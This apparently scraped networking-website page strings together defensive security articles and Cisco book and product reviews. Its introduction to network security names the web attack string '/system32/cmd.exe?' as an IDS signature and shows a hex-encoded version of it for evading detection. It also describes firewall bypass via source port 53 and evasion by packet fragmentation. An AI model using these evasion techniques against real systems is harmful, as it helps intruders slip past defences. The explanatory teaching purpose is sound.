Additionally, security updates may sometimes result in temporary downtime, forexposureSimple systems are easier to manage and therefore any security issues that apply to such systems can beaddressed with relative ease. However, complex systems and networks make it harder for a security analyst toassess their security status. For example, if an organization does not need to expose a large number of services on the Internet, the firewall configuration would be quite straightforward. However, the greater the company’sneed to be visible – an online retailer, for example – the more complex the firewall configuration will be, leavingroom for possible security holes that could be exploited by attackers to access internal network services.

When servers and desktop computers have fewer software packages installed, they are easier to keep up-todateand manage. This concept can work hand in hand with the principle of least privilege. By making use offewer components, fewer software and fewer privileges, you reduce the attack surface while allowing forsecurity to be more focused to tackle real issues.

Conclusion

Security in small and medium-sized businesses is more than just preventing viruses and blocking spam. In 2009,cybercrime is expected to increase as criminals attempt to exploit weaknesses in systems and in people. Thisdocument aims to give managers, analysts, administrators and operators in small and medium-sized businessesa snapshot of the IT security threats facing their organization. Every organization is different but in manyinstances the threats are common to all. Security is a cost of doing business but those that prepare themselveswell against possible threats will benefit the most in the long term.



  • Hits: 32516

Web Security Software Dealing With Malware

It is widely acknowledged that any responsible modern-day organization will strive to protect its network against malware attacks. Each day brings on a spawning of increasingly sophisticated viruses, worms, spyware, Trojans, and all other kinds of malicious software which can ultimately lead to an organization's network being compromised or brought down. Private information can be inadvertently leaked, a company's network can crash; whatever the outcome, poor security strategies could equal disaster. Having a network that is connected to the Internet leaves you vulnerable to attack, but Internet access is an absolute necessity for most organizations, so the wise thing to do would be to have a decent web security package installed on your machines, preferably at the gateway.

There are several antivirus engines on the market and each product has its own heuristics, and subsequently its own particular strengths and weaknesses. It's impossible to claim any one as the best overall at any given time. It can never be predicted which antivirus lab will be the quickest to release an update providing protection against the next virus outbreak; it is often one company on one occasion and another one the next.

Web security can never be one hundred percent guaranteed at all times, but, there are ways to significantly minimize the risks. It is good and usual practice to use an antivirus engine to help protect your network, but it would naturally be much better to use several of them at once. Why is this? If, hypothetically speaking, your organization uses product A, and a new virus breaks out, it might be Lab A or Lab B, or any other antivirus lab, which releases an update the fastest. So the logical conclusion would be that, the more AV engines you make use of, the greater the likelihood of you nipping that attack in the bud.

This is one of the ways in which web security software can give you better peace of mind. Files which are downloaded on any of your company's computers can each be scanned using several engines, rather than just one, which could significantly reduce the time it will take to obtain the latest virus signatures, therefore diminishing the risk to your site by each new attack.

Another plus side of web security software is that multiple download control policies can be set according to the individual organization's security policies, which could be either user, group or IP-based, controlling the downloading of different file types such as JavaScript, MP3, MPEG, exe, and more by specific users/groups/IP addresses. Hazardous files like Trojan downloader programs very often appear disguised as harmless files in order to gain access to a system. A good web security solution will analyze and detect the real file types HTTP/FTP file downloads, making sure that files which are downloaded contain no viruses or malware.

The long and short of it is this: you want the best security possible for your network, but it's not within anyone's power to predict where the next patch will come from. Rather than playing Russian roulette by sticking to one AV engine, adopt a web security package that will enable you to use several of them.

  • Hits: 13195

The Web Security Strategy for Your Organization

In today's business world, internet usage has become a necessity for doing business. Unfortunately, a company's use of the internet comes with considerable risk to its network and business information.

Web security threats include phishing attacks, malware, scareware, rootkits, keyloggers, viruses and spam. While many attacks occur when information is downloaded from a website, others are now possible through drive-by attacks where simply visiting a website can infect a computer. These attacks usually result in data and information leakage, loss in productivity, loss of network bandwidth and, depending on the circumstances, even liability issues for the company. In addition to all this, cleanup from malware and other types of attacks on a company's network are usually costly from both the dollar aspect as well as the time spent recovering from these web security threats.

Fortunately, there are steps a company can take to protect itself from these web security threats. Some are more effective than others, but the following suggestions should help narrow down the choices.

Employee Internet Usage Policy

The first and probably the least expensive solution would be to develop and implement an employee internet usage policy. This policy should clearly define what an employee can and cannot do when using the internet. It should also address personal usage of the internet on the business computer. The policy should identify the type of websites that can be accessed by the employee for business purposes and what, if any, type of material can be downloaded from the internet. Always make sure the information contained in the policy fits your unique business needs and environment.

Employee Education

Train your employees to recognize web security threats and how to lower the risk of infection. In today's business environment, laptops, smartphones, iPads, and other similar devices are not only used for business purposes, but also for personal and home use. When devices are used at home, the risk of an infection on that device is high and malware could easily be transferred to the business network. This is why employee education is so important.

Patch Management

Good patch management practices should also be in place and implemented using a clearly-defined patch management policy. Operating systems and applications, including browsers, should be updated regularly with the latest available security patches. The browser, whether a mobile version used on a smartphone or a full version used on a computer, is a primary vector for malware attacks and merits particular attention. Using the latest version of a browser is a must as known vulnerabilities would have been addressed

Internet Monitoring Software

Lastly, I would mention the use of internet monitoring software. Internet monitoring software should be able to protect the network against malware, scareware, viruses, phishing attacks and other malicious software. A robust internet monitoring software solution will help to enforce your company's internet usage policy by blocking connections to unacceptable websites, by monitoring downloads, and by monitoring encrypted web traffic going into and out of the network.

There is no single method that can guarantee 100% web security protection, however a well thought-out strategy is one huge step towards minimizing risk that the network could be targeted by the bad guys.

 



  • Hits: 17849

Introduction To Network Security - Part 1

As more and more people and businesses have begun to use computer networks and the Internet, the need for a secure computing environment has never been greater. Right now, information security professionals are in great demand and the importance of the field is growing every day. All the industry leaders have been placing their bets on security in the last few years.

All IT venodors agree today that secure computing is no longer an optional component, it is something that should be integrated into every system rather than being thrown in as an afterthought. Usually programmers would concentrate on getting a program working, and then (if there was time) try and weed out possible security holes.

Now, applications must be coded from the ground up with security in mind, as these applications will be used by people who expect the security and privacy of their data to be maintained.

This article intends to serve as a very brief introduction to information security with an emphasis on networking.

The reasons for this are twofold:

Firstly, in case you did not notice.. this is a networking website,

Secondly, the time a system is most vulnerable is when it is connected to the Internet.

For an understanding of what lies in the following pages, you should have decent knowledge of how the Internet works. You don't need to know the ins and outs of every protocol under the sun, but a basic understanding of network (and obviously computer) fundamentals is essential.

If you're a complete newbie however, do not despair. We would recommend you look under the Networking menu at the top of the site...where you will find our accolade winning material on pretty much everything in networking.

Hacker or Cracker?

There is a very well worn out arguement against using the incorrect use of the word 'hacker' to denote a computer criminal -- the correct term is a 'cracker' or when referring to people who have automated tools and very little real knowledge, 'script kiddie'. Hackers are actually just very adept programmers (the term came from 'hacking the code' where a programmer would quickly program fixes to problems he faced).

While many feel that this distinction has been lost due to the media portraying hackers as computer criminals, we will stick to the original definitions through these articles more than anything to avoid the inevitable flame mail we will get if we don't !

On to the Cool Stuff!

This introduction is broadly broken down into the following parts :

• The Threat to Home Users
• The Threat to the Enterprise
• Common Security Measures Explained
• Intrusion Detection Systems
• Tools an Attacker Uses
• What is Penetration-Testing?
• A Brief Walk-through of an Attack
• Where Can I Find More Information?
• Conclusion

The Threat to Home Users

Many people underestimate the threat they face when they use the Internet. The prevalent mindset is "who would bother to attack me or my computer?", while this is true -- it may be unlikely that an attacker would individually target you, as to him, you are just one more system on the Internet.

Many script kiddies simply unleash an automated tool that will scan large ranges of IP addresses looking for vulnerable systems, when it finds one, this tool will automatically exploit the vulnerability and take control of this machine.

The script kiddie can later use this vast collection of 'owned' systems to launch a denial of service (DoS) attacks, or just cover his tracks by hopping from one system to another in order to hide his real IP address.

This technique of proxying attacks through many systems is quite common, as it makes it very difficult for law enforcement to back trace the route of the attack, especially if the attacker relays it through systems in different geographic locations.

It is very feasible -- in fact quite likely -- that your machine will be in the target range of such a scan, and if you haven't taken adequate precautions, it will be owned.

The other threat comes from computer worms that have recently been the subject of a lot of media attention. Essentially a worm is just an exploit with a propagation mechanism. It works in a manner similar to how the script kiddie's automated tool works -- it scans ranges of IP addresses, infects vulnerable machines, and then uses those to scan further.

Thus the rate of infection increases geometrically as each infected system starts looking for new victims. In theory a worm could be written with such a refined scanning algorithm, that it could infect 100% of all vulnerable machines within ten minutes. This leaves hardly any time for response.

Another threat comes in the form of viruses, most often these may be propagated by email and use some crude form of social engineering (such as using the subject line "I love you" or "Re: The documents you asked for") to trick people into opening them. No form of network level protection can guard against these attacks.

The effects of the virus may be mundane (simply spreading to people in your address book) to devastating (deleting critical system files). A couple of years ago there was an email virus that emailed confidential documents from the popular Windows "My Documents" folder to everyone in the victims address book.

So while you per se may not be high profile enough to warrant a systematic attack, you are what I like to call a bystander victim.. someone who got attacked simply because you could be attacked, and you were there to be attacked.

As broadband and always-on Internet connections become commonplace, even hackers are targetting the IP ranges where they know they will find cable modem customers. They do this because they know they will find unprotected always-on systems here that can be used as a base for launching other attacks.

The Threat to the Enterprise

Most businesses have conceded that having an Internet presence is critical to keep up with the competition, and most of them have realised the need to secure that online presence.

Gone are the days when firewalls were an option and employees were given unrestricted Internet access. These days most medium sized corporations implement firewalls, content monitoring and intrusion detection systems as part of the basic network infrastructure.

For the enterprise, security is very important -- the threats include:

• Corporate espionage by competitors,
• Attacks from disgruntled ex-employees
• Attacks from outsiders who are looking to obtain private data and steal the company's crown jewels (be it a database of credit cards, information on a new product, financial data, source code to programs, etc.)
• Attacks from outsiders who just want to use your company's resources to store pornography, illegal pirated software, movies and music, so that others can download and your company ends up paying the bandwidth bill and in some countries can be held liable for the copyright violations on movies and music.

As far as securing the enterprise goes, it is not enough to merely install a firewall or intrustion detection system and assume that you are covered against all threats. The company must have a complete security policy and basic training must be imparted to all employees telling them things they should and should not do, as well as who to contact in the event of an incident. Larger companies may even have an incident response or security team to deal specifically with these issues.

One has to understand that security in the enterprise is a 24/7 problem. There is a famous saying, "A chain is only as strong as its weakest link", the same rule applies to security.

After the security measures are put in place, someone has to take the trouble to read the logs, occasionally test the security, follow mailing-lists of the latest vulnerabilities to make sure software and hardware is up-to-date etc. In other words, if your organisation is serious about security, there should be someone who handles security issues.

This person is often a network administrator, but invariably in the chaotic throes of day-to-day administration (yes we all dread user support calls ! :) the security of the organisation gets compromised -- for example, an admin who needs to deliver 10 machines to a new department may not password protect the administrator account, just because it saves him some time and lets him meet a deadline. In short, an organisation is either serious about security issues or does not bother with them at all.

While the notion of 24/7 security may seem paranoid to some people, one has to understand that in a lot of cases a company is not specifically targetted by an attacker. The company's network just happen to be one that the attacker knows how to break into and thus they get targetted. This is often the case in attacks where company ftp or webservers have been used to host illegal material.

The attackers don't care what the company does - they just know that this is a system accessible from the Internet where they can store large amounts of warez (pirated software), music, movies, or pornography. This is actually a much larger problem than most people are aware of because in many cases, the attackers are very good at hiding the illegal data. Its only when the bandwidth bill has to be paid that someone realises that something is amiss.

Firewalls

By far the most common security measure these days is a firewall. A lot of confusion surrounds the concept of a firewall, but it can basically be defined as any perimiter device that permits or denies traffic based on a set of rules configured by the administrator. Thus a firewall may be as simple as a router with access-lists, or as complex as a set of modules distributed through the network controlled from one central location.

The firewall protects everything 'behind' it from everything in front of it. Usually the 'front' of the firewall is its Internet facing side, and the 'behind' is the internal network. The way firewalls are designed to suit different types of networks is called the firewall topology.

Here is the link to a detailed explanation of different firewall topologies :Firewall.cx Firewall Topologies

You also get what are known as 'personal firewalls' such as Zonealarm, Sygate Personal Firewall , Tiny Personal Firewall , Symantec Endpoint Security etc.

These are packages that are meant for individual desktops and are fairly easy to use. The first thing they do is make the machine invisible to pings and other network probes. Most of them also let you choose what programs are allowed to access the Internet, therefore you can allow your browser and mail client, but if you see some suspicious program trying to access the network, you can disallow it. This is a form of 'egress filtering' or outbound traffic filtering and provides very good protection against trojan horse programs and worms.

However firewalls are no cure all solution to network security woes. A firewall is only as good as its rule set and there are many ways an attacker can find common misconfigurations and errors in the rules. For example, say the firewall blocks all traffic except traffic originating from port 53 (DNS) so that everyone can resolve names, the attacker could then use this rule to his advantage. By changing the source port of his attack or scan to port 53, the firewall will allow all of his traffic through because it assumes it is DNS traffic.

Bypassing firewalls is a whole study in itself and one which is very interesting especially to those with a passion for networking as it normally involves misusing the way TCP and IP are supposed to work. That said, firewalls today are becoming very sophisticated and a well installed firewall can severely thwart a would-be attackers plans.

It is important to remember the firewall does not look into the data section of the packet, thus if you have a webserver that is vulnerable to a CGI exploit and the firewall is set to allow traffic to it, there is no way the firewall can stop an attacker from attacking the webserver because it does not look at the data inside the packet. This would be the job of an intrusion detection system (covered further on).

Anti-Virus Systems

Everyone is familiar with the desktop version of anti virus packages like Norton Antivirus and Mcafee. The way these operate is fairly simple -- when researchers find a new virus, they figure out some unique characteristic it has (maybe a registry key it creates or a file it replaces) and out of this they write the virus 'signature'.

The whole load of signatures that your antivirus scans for what is known as the virus 'definitions'. This is the reason why keeping your virus definitions up-to-date is very important. Many anti-virus packages have an auto-update feature for you to download the latest definitions. The scanning ability of your software is only as good as the date of your definitions. In the enterprise, it is very common for admins to install anti-virus software on all machines, but there is no policy for regular update of the definitions. This is meaningless protection and serves only to provide a false sense of security.

With the recent spread of email viruses, anti-virus software at the MTA (Mail Transfer Agent , also known as the 'mail server') is becoming increasingly popular. The mail server will automatically scan any email it recieves for viruses and quarantine the infections. The idea is that since all mail passes through the MTA, this is the logical point to scan for viruses. Given that most mail servers have a permanent connection to the Internet, they can regularly download the latest definitions. On the downside, these can be evaded quite simply. If you zip up the infected file or trojan, or encrypt it, the anti-virus system may not be able to scan it.

End users must be taught how to respond to anti virus alerts. This is especially true in the enterprise -- an attacker doesn't need to try and bypass your fortress like firewall if all he has to do is email trojans to a lot of people in the company. It just takes one uninformed user to open the infected package and he will have a backdoor to the internal network.

It is advisable that the IT department gives a brief seminar on how to handle email from untrusted sources and how to deal with attachments. These are very common attack vectors simply because you may harden a computer system as much as you like, but the weak point still remains the user who operates it. As crackers say 'The human is the path of least resistance into the network'.

Intrusion Detection Systems

IDS's have become the 'next big thing' the way firewalls were some time ago. There are bascially two types of Intrusion Detection Systems :

• Host based IDS
• Network based IDS

Host based IDS - These are installed on a particular important machine (usually a server or some important target) and are tasked with making sure that the system state matches a particular set baseline. For example, the popular file-integrity checker Tripwire -- this program is run on the target machine just after it has been installed. It creates a database of file signatures for the system and regularly checks the current system files against their known 'safe' signatures. If a file has been changed, the administrator is alerted. This works very well as most attackers will replace a common system file with a trojaned version to give them backdoor access.

Network based IDS - These are more popular and quite easy to install. Basically they consist of a normal network sniffer running in promiscuous mode (in this mode the network card picks up all traffic even if its not meant for it). The sniffer is attached to a database of known attack signatures and the IDS analyses each packet that it picks up to check for known attacks. For example a common web attack might contain the string '/system32/cmd.exe?' in the URL. The IDS will have a match for this in the database and will alert the administrator.

Newer IDS' support active prevention of attacks - instead of just alerting an administrator, the IDS can dynamically update the firewall rules to disallow traffic from the attacking IP address for some amount of time. Or the IDS can use 'session sniping' to fool both sides of the connection into closing down so that the attack cannot be completed.

Unfortunately IDS systems generate a lot of false positives (a false positive is basically a false alarm, where the IDS sees legitimate traffic and for some reason matches it against an attack pattern) this tempts a lot of administrators into turning them off or even worse -- not bothering to read the logs. This may result in an actual attack being missed.

IDS evasion is also not all that difficult for an experienced attacker. The signature is based on some unique feature of the attack, and so the attacker can modify the attack so that the signature is not matched. For example, the above attack string '/system32/cmd.exe?' could be rewritten in hexadecimal to look something like the following:

'2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f'

Which might be totally missed by the IDS. Furthermore, an attacker could split the attack into many packets by fragmenting the packets. This means that each packet would only contain a small part of the attack and the signature would not match. Even if the IDS is able to reassemble fragmented packets, this creates a time overhead and since IDS' have to run at near real-time status, they tend to drop packets while they are processing. IDS evasion is a topic for a paper on its own.

The advantage of a network based IDS is that it is very difficult for an attacker to detect. The IDS itself does not need to generate any traffic, and in fact many of them have a broken TCP/IP stack so they don't have an IP address. Thus the attacker does not know whether the network segment is being monitored or not.

Patching and Updating

It is embarassing and sad that this has to be listed as a security measure. Despite being one of the most effective ways to stop an attack, there is a tremendously laid back attitude to regulary patching systems. There is no excuse for not doing this, and yet the level of patching remains woefully inadequate. Take for example the MSblaster worm that spread havoc recently. The exploit was known almost a month in advance, and a patch had been released, still millions of users and businesses were infected. While admins know that having to patch 500 machines is a laborious task, the way I look at it is I would rather be updating my systems on a regular basis than waiting for disaster to strike and then running around trying to patch and clean up those 500 systems.

For the home user, its a simple matter of running the automatic update software that every worthwhile OS comes with. In the enterprise there is no 'easy' way to patch large numbers of machines, but there are patch deployment mechanisms that take a lot of the burden away. Frankly, it is part of an admin's job to do this, and when a network is horribly fouled up by the latest worm it just means someone, somewhere didn't do his job well enough.

Click here to read 'Introduction to Network Security - Part 2'

  • Hits: 76733

The VIRL Book – A Guide to Cisco’s Virtual Internet Routing Lab (Cisco Lab)

cisco-virl-book-guide-to-cisco-virtual-internet-routing-lab-1Cisco’s Virtual Internet Routing Lab (VIRL) is a network simulation tool developed by Cisco that allows engineers, certification candidates and network architects to create their own Cisco Lab using the latest Cisco IOS devices such as Routers, Catalyst or Nexus switches, ASA Firewall appliances and more.

Read Jack Wang's Introduction to Cisco VIRL article to find out more information about the product

Being a fairly new but extremely promising product it’s quickly becoming the standard tool for Cisco Lab simulations. Managing and operating Cisco VIRL might have its challenges, especially for those new to the virtualization world, but one of the biggest problems has been the lack of dedicated online resources for VIRL management leaving a lot of unanswered questions on how to use VIRL for different types of simulations, how to build topologies, how to fine tune them etc.

The recent publication of “The VIRL Book’ by Jack Wang has changed the game for VIRL users. Tasks outlined above plus a lot more are now becoming easier to handle, helping users manage their VIRL server in an effective and easy to understand way.

The introduction to VIRL has been well crafted by Jack as he addressed each and every aspect of VIRL, why one should opt for VIRL, what VIRL can offer and how it different from other simulation tools.

This unique title addresses all possible aspects of VIRL and has been written to satisfy even the most demanding users seeking to create complex network simulations. Key topics covered include:

  • Planning the VIRL Installation
  • Installing VIRL
  • Creating your first simulation
  • Basic operation & best practices,
  • Understanding the anatomy of VIRL
  • External Connectivity to the world
  • Advanced features
  • Use VIRL for certifications
  • Running 3rd party virtual machines
  • Sample Network Topologies

The Planning the VIRL Installation section walks through the various VIRL installation options, be it a virtual machine, bare metal installation or on the cloud, what kind of hardware suits the VIRL installation. This makes life easier for VIRL users to ensure they are planning well and selecting the right hardware for their VIRL installation.

Understanding the Cisco VIRL work-flow

Figure 1. Understanding the Cisco VIRL work-flow

The Installing VIRL section is quite engaging as Jack walks through the installation of VIRL on various virtual platforms such as VMware vSphere ESXI, VMWare Fusion, VMWare Workstation, Bare-Metal and on the cloud. All these installations are described simple steps and with great illustrations. The troubleshooting part happens to be the cream of this section as it dives into small details such as bios settings and more, proving how attentive the author is to simplifying troubleshooting.

The Creating your first simulation section is a very helpful section as it goes though in depth about how to create a simulation, comparison of Design mode and Simulation mode, generating initial configurations etc. This section really helped us to understand VIRL in depth and especially how to create a simulation with auto configurations.

The External connectivity to the world section helps the user open up to a new world of virtualization and lab simulations. Jack really mastered this section and simplified the concepts of FLAT network and SNAT network while at the same time dealing with issues like how to add 3rd party virtual machines into VIRL. The Palo Alto Firewall integration happens to be our favorite.

To summarize, this title is a must guide for all Cisco VIRL users as it deals with every aspect of VIRL and we believe this not only simplifies the use of the product but also helps users understand how far they can go with it. Jack’s hard work and insights are visible in every section of the book and we believe it’s not an easy task to come out with such a great title. We certainly congratulate Jack. This is a title that should not be missing from any Cisco VIRL user’s library.

  • Hits: 15885

Cisco Press Review for “Cisco Firepower and Advanced Malware Protection Live Lessons” Video Series

Title:              Cisco Firepower & Advanced Malware Protection Live Lessons
Authors:        Omar Santos
ISBN-10:       0-13-446874-0
Publisher:     Cisco Press
Published:    June 22, 2016
Edition:         1st Edition
Language:    English

cisco-firepower-and-advanced-malware-protection-live-lessons-1The “Cisco Firepower and Advanced Malware Protection Live Lessons” video series by Omar Santos is the icing on the cake for someone who wants to start their journey of Cisco Next-Generation Network Security. This video series contains eight lessons on the following topics:

Lesson 1: Fundamentals of Cisco Next-Generation Network Security

Lesson 2: Introduction and Design of Cisco ASA with FirePOWER Services

Lesson 3: Configuring Cisco ASA with FirePOWER Services

Lesson 4: Cisco AMP for Networks

Lesson 5: Cisco AMP for Endpoints

Lesson 6: Cisco AMP for Content Security

Lesson 7: Configuring and Troubleshooting the Cisco Next-Generation IPS Appliances

Lesson 8: Firepower Management Center

Lesson 1 deals with the fundamentals of Cisco Next-Generation Network Security products, like security threats, Cisco ASA Next-Generation Firewalls, FirePOWER Modules, Next-Generation Intrusion Prevention Systems, Advanced Malware Protection (AMP), Email Security, Web Security, Cisco ISE, Cisco Meraki Cloud Solutions and much more. Omar Santos has done an exceptional job creating short videos, which are a maximum of 12 minutes, he really built up the series with a very informative introduction dealing with the security threats the industry is currently facing, the emergence of Internet of Things (IOT) and its impact and the challenges of detecting threats.

Lesson 2 deals with the design aspects of the ASA FirePOWER Service module, how it can be deployed in production networks, how High-Availability (HA) works, how ASA FirePOWER services can be deployed at the Internet Edge and the VPN scenarios it supports. The modules in this lesson are very brief and provide an overview. If someone were looking for in-depth information they must refer to Cisco documentation.  

Lesson 3 is the most important lesson of the series as it deals with the initial setup of the Cisco ASA FirePOWER Module in Cisco ASA 5585-X and Cisco ASA 5500-X appliances, also Omar demonstrates how Cisco ASA redirects traffic to the Cisco ASA FirePOWER module and he concludes the lesson with basic troubleshooting steps.

Lessons 4, 5 and 6 are dedicated to Cisco AMP for networks, endpoints and content security. Omar walks through an introduction to AMP, each lesson deals with various options, it’s a good overview of AMP and he’s done a commendable job keeping it flowing smoothly. Cisco AMP for endpoint is quite interesting as Omar articulates the info in a much easier way and the demonstrations are good to watch.

The best part of this video series is the Lesson that deals with the configuration of Cisco ASA with FirePOWER services, in a very brief way Omar shows the necessary steps for the successful deployment in the Cisco ASA 5585-X and Cisco ASA 5500-X platform.

The great thing about Cisco Press is that it ensures one doesn’t need to hunt for reference or study materials, it always has very informative products in the form of videos and books. You can download these videos and watch them at your own pace.

To conclude, the video series is really good to watch as it deals with various topics of Cisco Next-Generation Security products in less than 13 minutes, the language used is quite simple and easy to understand, however, this video series could do with more live demonstrations especially a demonstration on how to reimage the ASA appliances to install the Cisco FirePOWER module.

This is a highly recommended product especially for engineers interested in better understanding how Cisco’s Next-Generation security products operate and more specifically the Cisco FirePOWER services, Cisco AMP and advanced threat detection & protection.

  • Hits: 10014

Cisco CCNP Routing & Switching v2.0 – Official Cert Guide Library Review (Route 300-101, Switch 300-115 & Tshoot 300-135)

Title:          Cisco CCNP Routing & Switching v2.0 – Official Cert Guide Library
Authors:    Kevin Wallace, David Hucaby, Raymond Lacoste    
ISBN-13:    978-1-58720-663-4
Publisher:  Cisco Press
Published:  December 23rd, 2014
Edition:      1st Edition
Language:  English

Reviewer: Chris Partsenidis

star-5  

CCNP Routing and Switching - Library V2 ISBN 0-13-384596-6The Cisco CCNP Routing and Switching (CCNP R&S) certification is the most popular Cisco Professional series certification at the moment, requiring candidates sit and pass three professional level exams: Route 300-101, Switch 300-115 & Tshoot 300-135.

The Cisco Press CCNP R&S v2.0 Official Cert Guide Library has been updated to reflect the latest CCNP R&S curriculum updates (2014) and is perhaps the only comprehensive study guide out there, that guarantees to help you pass all three exams on your first try, saving money, time and unwanted disappointments – and ‘no’ - this is not a sales pitch as I personally used the library for my recently acquired CCNP R&S certification!  I’ll be writing about my CCNP R&S certification path experience very soon on Firewall.cx.

The CCNP R&S v2 Library has been written by three well-known CCIE veteran engineers (Kevin Wallace, David Hucaby, Raymond Lacoste) and with the help and care of Cisco Press, they’ve managed to produce the best CCNP R&S study guide out there.   While the CCNP R&S Library is aimed for CCNP certification candidates – it can also serve as a great reference guide for those seeking to increase their knowledge on advanced networking topics, technologies and improve their troubleshooting skills.

The Cisco Press CCNP R&S v2 Library is not just a simple update to the previous study guide. Key topics for each of the three exams are now clearer than ever, with plentiful examples, great diagrams, finer presentation and analysis.

The CCNP Route exam (300-101) emphasizes on a number of technologies and features that are also reflected in the ROUTE study guide book. IPv6 (dual-stack), EIGRP IPv6 & OSPF IPv6, RIPng (RIP IPv6), NAT (IPv4 & IPv6), VPN Concepts (DMVPN and Easy VPN), are amongst the list of ‘hot’ topics covered in ROUTE book. Similarly the CCNP Switch exam (300-115) emphasizes, amongst other topics, on Cisco StackWise, Virtual Switching Service (VSS) and Advanced Spanning Tree Protocol implementations – all of which are covered extensively in the SWITCH book.

Each of the three books is accompanied by a CD, containing over 200 practice questions (per CD) that are designed to help prepare the candidate for the real exam. Additional material on each CD includes memory table exercises and answer keys, a generous amount of videos, plus a study planner tool – that’s pretty much everything you’ll need for a successful preparation and achieving the ultimate goal: passing each exam.

Using the CCNP R&S v2 Library to help me prepare for each CCNP exam was the best thing I did after making the decision to pursue the CCNP certification. Now it’s proudly sitting amongst my other study guides and used occasionally when I need a refresh on complex networking topics.

  • Hits: 15847

GFI’s LANGUARD Update – The Most Trusted Patch Management Tool & Vulnerability Scanner Just Got Better!

gfi-languardGFI’s LanGuard is one of the world’s most popular and trusted patch management & vulnerability scanner products designed to effectively monitor and manage networks of any size. IT Administrators, Network Engineers and IT Managers who have worked with Languard would surely agree that the above statement is no exaggeration.

Readers who haven’t heard or worked with GFI’s LanGuard product should definitely visit our LanGuard 2014 product review and read about the features this unique network security product offers and download their free copy.

GFI recently released an update to LanGuard, taking the product to a whole new level by providing new key-features that have caught us by surprise.

Following is a short list of them:

  • Mobile device scanning:  customers can audit mobile devices that connect to Office 365, Google Apps and Apple Profile Manager.
  • Expanded vulnerability assessment for network devices: GFI LanGuard 2014 R2 offers vulnerability assessment of routers, printers and switches from the following vendors: Cisco, 3Com, Dell, SonicWALL, Juniper Networks, NETGEAR, Nortel, Alcatel, IBM and Linksys. 
  • CIPA compliance reports: CIPA compliance reports: additional reporting to ensure US schools and libraries adhere to the Children’s Internet Protection Act (CIPA). GFI LanGuard has now dedicated compliance reports for 11 security regulations and standards, including PCI DSS, HIPAA, SOX and PSN CoCo.
  • Support for Fedora: Fedora is 7th Linux distribution supported by LanGuard for automatic patch management
  • Chinese Localization: GFI LanGuard 2014 R2 is now also available in Chinese Traditional and Simplified versions.

One of the features we loved was the incredible support of Cisco products. With its latest release, GFI LanGuard supports over 1500 different Cisco products ranging from routers (including the newer ISR Gen 2), Catalyst switches (Layer2 & Layer3 switches), Cisco Nexus switches, Cisco Firewalls (PIX & ASA Series), VPN Gateways, Wireless Access points, IPS & IDS Sensors, Voice Gateways and much more!

  • Hits: 10638

CCIE Collaboration Quick Reference Review

Title:              CCIE Collaboration Quick Reference
Authors:        Akhil Behl
ASIN:             B00KDIM9FI
Publisher:      Cisco Press
Published:     May 16, 2014
Edition:         1st Edition
Language:     English

Reviewer: Arani Mukherjee

star-5  

0-13-384596-6This ebook has been designed for a specific target audience, as the title of the book suggests, hence it cannot be alleged that it is not suitable for all levels of Cisco expertise. Furthermore, since it is a quick reference, there is no scope for something like poetic licence. As a quick reference, it achieves the two key aims:

1) Provide precise information
2) Do it in a structured format

And eliminate any complexity or ambiguity on the subject matter by adhering to these two key aims.

Readers of this review have to bear in mind that the review is not about the content/subject matter and its technical accuracy. This has already been achieved by the technical reviewer, as mentioned in the formative sections of the ebook. This review is all about how effectively the ebook manages to deliver key information to its users.

So, to follow up on that dictum, it would be wise to scan through how the material has been laid out.

It revolves around the Cisco Unified Communication (UC) workspace service infrastructure and explains what it stands for and how it delivers what it promises. So the first few chapters are all about the deployment of this service. Quality of Service (QoS) follows deployment. This chapter is dedicated entirely towards ensuring the network infrastructure will provide the classification of policies and scheduling for multiple network traffic classes.

The next chapter is Telephony Standards and Protocols. This chapter talks about the various voice based protocols and their respective criteria. These include analog, digital and fax communication protocols.

From this point onwards the reference material concentrates purely on the Cisco Unified Communication platform. It discusses the relevant subsections of CUCM in the following line-up:

  • Cisco Unified Communications Manager
  • Cisco Unified Communications Security
  • Cisco Unity Connection
  • Cisco Unified Instant Messaging and Presence
  • Cisco Unified Contact Centre Express
  • Cisco IOS Unified Communications Applications &
  • Cisco Collaboration Network Management

In conclusion, what we need to prove or disprove are the key aims of a quick reference:

Does it provide precise information? - The answer is Yes. It does so due to the virtue that it is a reference guide. Information has to be precise as it would be used in situations where credibility or validity won't be questioned.

Does it do the above in a structured manner? - The answer is Yes. The layout of the chapters in its current form helps to achieve that. The trajectory of the discussion through the material ensures it as well.

Does it eliminate any complexity and ambiguity? - The answer again is Yes. This is a technical reference material and not a philosophical debate penned down for the benefit of its readers. The approach of the author is very simplistic. It follows the natural order of events from understanding the concept, deploying the technology and ensuring quality of the services, to managing the technology to provide a robust efficient workspace environment.

In addition to the above proof it needs to be mentioned that, since it is an eBook, users will find it easy to use it from various mobile platforms like tablets or smart phones. It wouldn’t be easy to carry around a 315 page reference guide, even if it was printed on both sides of the paper!

For its target audience, this eBook will live up to its readers expectations and is highly recommended for anyone pursuing the CCIE Collaboration or CCNP Voice certification.

  • Hits: 14657

CCIE Collaboration Quick Reference Exam Guide

Title:             CCIE Collaboration Quick Reference
Authors:        Akhil Behl
ISBN-10(13): 0-13-384596-6
Publisher:      Cisco Press
Published:      May  2014
Edition:          1st Edition
Language:      English

star-5

CCIE Collaboration Quick ReferenceThis title addresses the current CCIE Collaboration exam from both written and lab exam perspective. The title helps CCIE aspirants to achieve CCIE Collaboration certification and excel in their professional career. The ebook is now available for pre-order and is scheduled for release on 16 May 2014.
 
Here’s the excerpt from Cisco Press website:

CCIE Collaboration Quick Reference provides you with detailed information, highlighting the key topics on the latest CCIE Collaboration v1.0 exam. This fact-filled Quick Reference allows you to get all-important information at a glance, helping you to focus your study on areas of weakness and to enhance memory retention of important concepts. With this book as your guide, you will review and reinforce your knowledge of and experience with collaboration solutions integration and operation, configuration, and troubleshooting in complex networks. You will also review the challenges of video, mobility, and presence as the foundation for workplace collaboration solutions. Topics covered include Cisco collaboration infrastructure, telephony standards and protocols, Cisco Unified Communications Manager (CUCM), Cisco IOS UC applications and features, Quality of Service and Security in Cisco collaboration solutions, Cisco Unity Connection, Cisco Unified Contact Center Express, and Cisco Unified IM and Presence.

This book provides a comprehensive final review for candidates taking the CCIE Collaboration v1.0 exam. It steps through exam objectives one-by-one, providing concise and accurate review for all topics. Using this book, exam candidates will be able to easily and effectively review test objectives without having to wade through numerous books and documents for relevant content for final review.

Table of Contents

Chapter 1 Cisco Collaboration Infrastructure
Chapter 2 Understanding Quality of Service
Chapter 3 Telephony Standards and Protocols
Chapter 4 Cisco Unified Communications Manager
Chapter 5 Cisco Unified Communications Security
